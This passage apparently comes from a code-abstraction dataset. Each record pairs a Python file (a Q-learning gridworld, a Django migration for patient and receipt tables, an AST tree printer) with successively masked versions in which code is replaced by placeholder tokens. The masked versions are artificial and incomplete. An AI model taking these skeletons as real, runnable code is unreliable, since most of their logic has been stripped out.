action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\n<function token>\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\n<function token>\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\n<function token>\n<function token>\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n<function token>\n<function 
token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n <function token>\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n 
self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n <function token>\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n <function token>\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n <function token>\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n <function token>\n <function token>\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n<class token>\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
41
52da8608e43b2d8dfe00f0956a1187fcf2e7b1ff
# Generated by Django 2.2.6 on 2020-05-21 09:44 import datetime from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('DHOPD', '0015_auto_20200515_0126'), ] operations = [ migrations.CreateModel( name='Patient_c', fields=[ ('patient_id', models.AutoField(max_length=200, primary_key=True, serialize=False)), ('patient_fname', models.CharField(max_length=200)), ('patient_mname', models.CharField(max_length=200)), ('patient_lname', models.CharField(max_length=200)), ('patient_title', models.CharField(max_length=20)), ('patient_address', models.CharField(max_length=500)), ('patient_town', models.CharField(max_length=200)), ('patient_phone', models.CharField(max_length=15)), ('patient_services', models.CharField(max_length=500)), ('patient_status', models.CharField(max_length=2)), ('patient_cost', models.CharField(max_length=100)), ('patient_date', models.DateField(default=datetime.date.today)), ('patient_time', models.TimeField(auto_now_add=True)), ('patient_comment', models.CharField(max_length=200)), ], ), migrations.CreateModel( name='Receipt_c', fields=[ ('receipt_id', models.AutoField(max_length=200, primary_key=True, serialize=False)), ('receipt_patient', models.CharField(max_length=200)), ('receipt_cost', models.CharField(max_length=200)), ('receipt_time', models.TimeField(auto_now=True)), ('receipt_status', models.CharField(default='-1', max_length=10)), ], ), ]
[ "# Generated by Django 2.2.6 on 2020-05-21 09:44\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('DHOPD', '0015_auto_20200515_0126'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Patient_c',\n fields=[\n ('patient_id', models.AutoField(max_length=200, primary_key=True, serialize=False)),\n ('patient_fname', models.CharField(max_length=200)),\n ('patient_mname', models.CharField(max_length=200)),\n ('patient_lname', models.CharField(max_length=200)),\n ('patient_title', models.CharField(max_length=20)),\n ('patient_address', models.CharField(max_length=500)),\n ('patient_town', models.CharField(max_length=200)),\n ('patient_phone', models.CharField(max_length=15)),\n ('patient_services', models.CharField(max_length=500)),\n ('patient_status', models.CharField(max_length=2)),\n ('patient_cost', models.CharField(max_length=100)),\n ('patient_date', models.DateField(default=datetime.date.today)),\n ('patient_time', models.TimeField(auto_now_add=True)),\n ('patient_comment', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='Receipt_c',\n fields=[\n ('receipt_id', models.AutoField(max_length=200, primary_key=True, serialize=False)),\n ('receipt_patient', models.CharField(max_length=200)),\n ('receipt_cost', models.CharField(max_length=200)),\n ('receipt_time', models.TimeField(auto_now=True)),\n ('receipt_status', models.CharField(default='-1', max_length=10)),\n ],\n ),\n ]\n", "import datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('DHOPD', '0015_auto_20200515_0126')]\n operations = [migrations.CreateModel(name='Patient_c', fields=[(\n 'patient_id', models.AutoField(max_length=200, primary_key=True,\n serialize=False)), ('patient_fname', models.CharField(max_length=\n 200)), ('patient_mname', models.CharField(max_length=200)), (\n 'patient_lname', models.CharField(max_length=200)), (\n 'patient_title', models.CharField(max_length=20)), (\n 'patient_address', models.CharField(max_length=500)), (\n 'patient_town', models.CharField(max_length=200)), ('patient_phone',\n models.CharField(max_length=15)), ('patient_services', models.\n CharField(max_length=500)), ('patient_status', models.CharField(\n max_length=2)), ('patient_cost', models.CharField(max_length=100)),\n ('patient_date', models.DateField(default=datetime.date.today)), (\n 'patient_time', models.TimeField(auto_now_add=True)), (\n 'patient_comment', models.CharField(max_length=200))]), migrations.\n CreateModel(name='Receipt_c', fields=[('receipt_id', models.\n AutoField(max_length=200, primary_key=True, serialize=False)), (\n 'receipt_patient', models.CharField(max_length=200)), (\n 'receipt_cost', models.CharField(max_length=200)), ('receipt_time',\n models.TimeField(auto_now=True)), ('receipt_status', models.\n CharField(default='-1', max_length=10))])]\n", "<import token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('DHOPD', '0015_auto_20200515_0126')]\n operations = [migrations.CreateModel(name='Patient_c', fields=[(\n 'patient_id', models.AutoField(max_length=200, primary_key=True,\n serialize=False)), ('patient_fname', models.CharField(max_length=\n 200)), ('patient_mname', models.CharField(max_length=200)), (\n 'patient_lname', models.CharField(max_length=200)), (\n 'patient_title', models.CharField(max_length=20)), (\n 'patient_address', models.CharField(max_length=500)), (\n 'patient_town', 
models.CharField(max_length=200)), ('patient_phone',\n models.CharField(max_length=15)), ('patient_services', models.\n CharField(max_length=500)), ('patient_status', models.CharField(\n max_length=2)), ('patient_cost', models.CharField(max_length=100)),\n ('patient_date', models.DateField(default=datetime.date.today)), (\n 'patient_time', models.TimeField(auto_now_add=True)), (\n 'patient_comment', models.CharField(max_length=200))]), migrations.\n CreateModel(name='Receipt_c', fields=[('receipt_id', models.\n AutoField(max_length=200, primary_key=True, serialize=False)), (\n 'receipt_patient', models.CharField(max_length=200)), (\n 'receipt_cost', models.CharField(max_length=200)), ('receipt_time',\n models.TimeField(auto_now=True)), ('receipt_status', models.\n CharField(default='-1', max_length=10))])]\n", "<import token>\n\n\nclass Migration(migrations.Migration):\n <assignment token>\n <assignment token>\n", "<import token>\n<class token>\n" ]
false
42
1084478226777b9259274e053984ac34d461198d
from .ast import * # noinspection PyPep8Naming def addToClass(cls): def decorator(func): setattr(cls, func.__name__, func) return func return decorator def print_intended(to_print, intend): print(intend * "| " + to_print) # noinspection PyPep8Naming,PyUnresolvedReferences class TreePrinter: # General @addToClass(Node) def printTree(self, indent=0): raise Exception("printTree not defined in class " + self.__class__.__name__) @addToClass(Instruction) def printTree(self, indent=0): print_intended(self.type, indent) @addToClass(Expression) def printTree(self, indent=0): print_intended(self.type, indent) # Instructions @addToClass(Block) def printTree(self, indent=0): print_intended(self.type, indent) if self.instructions is not None: self.instructions.printTree(indent + 1) @addToClass(Assignment) def printTree(self, indent=0): print_intended(self.operator, indent) self.left.printTree(indent + 1) self.right.printTree(indent + 1) @addToClass(For) def printTree(self, indent=0): print_intended(self.type, indent) self.variable.printTree(indent + 1) self.range.printTree(indent + 1) self.instruction.printTree(indent + 1) @addToClass(While) def printTree(self, indent=0): print_intended(self.type, indent) self.condition.printTree(indent + 1) self.instruction.printTree(indent + 1) @addToClass(If) def printTree(self, indent=0): print_intended(self.type, indent) self.condition.printTree(indent + 1) print_intended('then', indent) self.if_block.printTree(indent + 1) if self.else_block is not None: print_intended('else', indent) self.else_block.printTree(indent + 1) @addToClass(Print) def printTree(self, indent=0): print_intended(self.type, indent) self.args.printTree(indent + 1) @addToClass(Return) def printTree(self, indent=0): print_intended(self.type, indent) if self.args is not None: self.args.printTree(indent + 1) @addToClass(ArrayElement) def printTree(self, indent=0): print_intended("get_element", indent) self.array.printTree(indent + 1) self.ids.printTree(indent + 1) # Expressions @addToClass(Value) def printTree(self, indent=0): print_intended(str(self.value), indent) @addToClass(Array) def printTree(self, indent=0): if self.list is not None: print_intended('array', indent) self.list.printTree(indent + 1) else: print_intended('empty_array', indent) @addToClass(BinaryExpression) def printTree(self, indent=0): print_intended(self.operator, indent) self.left.printTree(indent + 1) self.right.printTree(indent + 1) @addToClass(MatrixFunction) def printTree(self, indent=0): print_intended(self.function, indent) self.parameter.printTree(indent + 1) @addToClass(UnaryMinus) def printTree(self, indent=0): print_intended('-', indent) self.value.printTree(indent + 1) @addToClass(Transpose) def printTree(self, indent=0): print_intended(self.type, indent) self.value.printTree(indent + 1) # Other @addToClass(Program) def printTree(self, indent=0): print_intended(self.type, indent) self.instructions_opt.printTree(indent + 1) @addToClass(Identifier) def printTree(self, indent=0): print_intended(self.name, indent) @addToClass(Range) def printTree(self, indent=0): print_intended(self.type, indent) self.start_value.printTree(indent + 1) self.end_value.printTree(indent + 1) @addToClass(List) def printTree(self, indent=0): for element in self.elements: element.printTree(indent)
[ "from .ast import *\n\n\n# noinspection PyPep8Naming\ndef addToClass(cls):\n def decorator(func):\n setattr(cls, func.__name__, func)\n return func\n\n return decorator\n\n\ndef print_intended(to_print, intend):\n print(intend * \"| \" + to_print)\n\n\n# noinspection PyPep8Naming,PyUnresolvedReferences\nclass TreePrinter:\n\n # General\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception(\"printTree not defined in class \" + self.__class__.__name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n # Instructions\n @addToClass(Block)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.instructions is not None:\n self.instructions.printTree(indent + 1)\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n\n @addToClass(Return)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.args is not None:\n self.args.printTree(indent + 1)\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended(\"get_element\", indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n # Expressions\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n # Other\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n\n @addToClass(Range)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.start_value.printTree(indent + 1)\n self.end_value.printTree(indent + 1)\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in 
self.elements:\n element.printTree(indent)\n", "from .ast import *\n\n\ndef addToClass(cls):\n\n def decorator(func):\n setattr(cls, func.__name__, func)\n return func\n return decorator\n\n\ndef print_intended(to_print, intend):\n print(intend * '| ' + to_print)\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Block)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.instructions is not None:\n self.instructions.printTree(indent + 1)\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n\n @addToClass(Return)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.args is not None:\n self.args.printTree(indent + 1)\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n\n @addToClass(Range)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.start_value.printTree(indent + 1)\n self.end_value.printTree(indent + 1)\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n\n\ndef addToClass(cls):\n\n def 
decorator(func):\n setattr(cls, func.__name__, func)\n return func\n return decorator\n\n\ndef print_intended(to_print, intend):\n print(intend * '| ' + to_print)\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Block)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.instructions is not None:\n self.instructions.printTree(indent + 1)\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n\n @addToClass(Return)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.args is not None:\n self.args.printTree(indent + 1)\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n\n @addToClass(Range)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.start_value.printTree(indent + 1)\n self.end_value.printTree(indent + 1)\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n\n\ndef addToClass(cls):\n\n def decorator(func):\n setattr(cls, func.__name__, func)\n return func\n return decorator\n\n\n<function 
token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Block)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.instructions is not None:\n self.instructions.printTree(indent + 1)\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n\n @addToClass(Return)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.args is not None:\n self.args.printTree(indent + 1)\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n\n @addToClass(Range)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.start_value.printTree(indent + 1)\n self.end_value.printTree(indent + 1)\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n 
@addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Block)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.instructions is not None:\n self.instructions.printTree(indent + 1)\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n\n @addToClass(Return)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.args is not None:\n self.args.printTree(indent + 